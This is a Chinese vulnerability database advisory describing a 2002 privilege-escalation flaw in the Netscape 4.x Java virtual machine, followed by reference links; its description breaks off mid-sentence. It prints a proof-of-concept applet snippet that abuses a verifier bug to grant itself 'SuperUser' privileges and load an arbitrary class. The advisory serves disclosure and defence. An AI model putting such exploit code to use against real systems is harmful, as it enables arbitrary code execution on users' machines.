http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-443

NetscapeCommunicator/Navigator的JVM实现使用了SymantecJustInTime(JIT)编译器，Java虚拟机在共享动态实现，并默认被NetscapeBrowser使用。Netscape4浏览器Java虚拟机实现由于部分方法被调用的时候不安全，远程攻击者可以利用这个漏洞构建恶意JavaApplet，在JVM环境中装载恶意类而可能以高权限执行任意代码。构建如下applet代码运行在Netscape4.xweb浏览器中可以导致权限提升：PrivilegeManagerpm=PrivilegeManager.getPrivilegeManager();VerifierBugbug=newVerifierBug();MyPrivilegeManagermpm=bug.cast2MyPrivilegeManager(pm);Targettarget=Target.findTarget(“SuperUser”);Privilegepriv=Privilege.findPrivilege(Privilege.ALLOWED，Privilege.FOREVER);PrivilegeTableprivtab=newPrivilegeTable();privtab.put(target，priv);Principalprincipal=PrivilegeManager.getMyPrincipals()[0];mpm.itsPrinToPrivTable.put(principal，privtab);try{ClassLoadercl=getClass().getClassLoader();Classc=cl.loadClass(“Beyond”);c.newInstance();}catch(Throwablee){}获得PrivilegeManagerobject引用指针的值并保存在pm变量中，然后可利用NetscapeJVM中的一个缺陷结合其他漏洞提升权限。实际提升权限的攻击在如下代码中：Principalprincipal=PrivilegeManager.getMyPrincipals()[0];mpm.itsPrinToPrivTable.put(principal，privtab);首先，从PrivilegeManager类的Princ

来源:XF
名称:netscape-java-insecure-classes(10714)
链接:http://xforce.iss.net/xforce/xfdb/10714
来源:BID
名称:6223
链接:http://www.securityfocus.com/bid/6223
来源:www.lsd-pl.net
链接:http://www.lsd-pl.net/documents/javasecurity-1.0.0.pdf
来源:BUGTRAQ
名称:20021121[LSD]JavaandJVMsecurityvulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=103798147613151&w;=2
来源：NSFOCUS
名称：3884
链接：http://www.nsfocus.net/vulndb/3884